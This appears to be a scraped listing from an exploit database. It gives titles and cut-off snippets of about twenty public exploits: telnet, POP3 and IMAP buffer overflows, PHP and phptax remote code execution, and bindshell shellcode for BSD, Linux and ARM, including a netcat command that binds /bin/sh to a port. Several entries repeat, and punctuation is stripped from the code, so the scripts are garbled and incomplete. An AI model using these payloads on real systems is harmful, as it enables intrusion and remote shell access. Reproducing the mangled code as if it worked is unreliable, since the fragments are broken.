GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)

No description provided by source. / cybertronicatgmxdotnet offset fixed! cybertronic @ GoodTech $ gcc -o goodtechexpl goodtechexpl.c cybertronic @ GoodTech $ ./goodtechexpl Usage ----- Bindshell ./goodtechexpl host Reverseshell ./goodtechexpl host connectback ip connectback port cybertronic @...

PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP...

phptax 0.8 <= Remote Code Execution Vulnerability

Exploit for php platform in category web applications ----------------------------------------------------- phptax 0.8 Vendor information: "PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See...

phptax 0.8 - Remote Code Execution

phptax 0.8 - Remote Code Execution ----------------------------------------------------- phptax 0.8 Vendor information: "PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See homepage for detai...

PHP 5.4 Win32 Code Execution

// Exploit Title: PHP 5.4 5.4.3 Code Execution 0day Win32 // Exploit author: 0in Maksymilian Motyl // Email: 0indotemailatgmail.com // Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched Polish =================== offset-brute.html...

MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439...

MailMax 4.6 POP3 Buffer Overflow

!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...

WorldMail imapd 3.0 SEH overflow (egg hunter)

Exploit for windows platform in category remote exploits !/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3:...

IBM-Tivoli-Storage

A vulnerability exists in the way IBM Tivoli Storage Manager Express 5.3 CAD Service Buffer Overflow process a clients request. The vulnerability is caused due to a boundary error in when handling network messages and can be exploited to cause a stack-based buffer overflow via a specially crafted...

BSDi/x86 - BindShell on 31337 port - Shellcode 117 Bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

Linux/x86 - netcat bindshell port 6666 - 69 bytes

No description provided by source. / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 .text: 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 804805...

linux/x86 - netcat bindshell port 6666 - 69 bytes

/ Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 74 63 61 74 push $0x74616374...

Linux/x86 - netcat bindshell port 6666 - 69 bytes

Linux/x86 - netcat bindshell port 6666 - 69 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/jonathansalwan /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054...

Microsoft Internet Explorer 6/7/8 - Memory Corruption

Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 Tested on Windows XP SP3 IE6 IE7 IE8 Coded by Matteo Memelli ryujin at offsec.com http://www.offensive-security.com/0day/ie-0day.txt Thx to dookie at offsec.com notes : This is a quick and dirty exploit! No DEP/ASLR bypass here...

linux/ARM - Bindshell port 0x1337 Shellcode

Exploit for linux/x86 platform in category shellcode =========================================== linux/ARM - Bindshell port 0x1337 Shellcode =========================================== / Title: arm-bind-listen Brief: Bind a shell to port 0x1337 on any local address and wait for connections Author...

ARM Bindshell port 0x1337

ARM Bindshell port 0x1337. Shellcode exploit for arm platform / Title: arm-bind-listen Brief: Bind a shell to port 0x1337 on any local address and wait for connections Author: Daniel Godas-Lopez / / socdes = socketAFINET, SOCKSTREAM, IPPROTOTCP; / mov %r0, $2 / AFINET / mov %r1, $1 / SOCKSTREAM /...

bds/x86-bindshell on port 2525 shellcode - 167 bytes

bds/x86-bindshell on port 2525 shellcode - 167 bytes. Shellcode exploit for bsd platform / ================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== / / -------------- bds/x86-bindshell on port 2525 167...

SigPlus Pro 3.74 Buffer Overflow

!-- =================================================================================================== SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString Remote BoF JIT Spray - aslr/dep bypass Author: mrme - @StevenSeeley Download:...

SigPlus Pro 3.74 - ActiveX &#039;LCDWriteString()&#039; Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)

!-- =================================================================================================== SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString Remote BoF JIT Spray - aslr/dep bypass Author: mrme - @StevenSeeley Download:...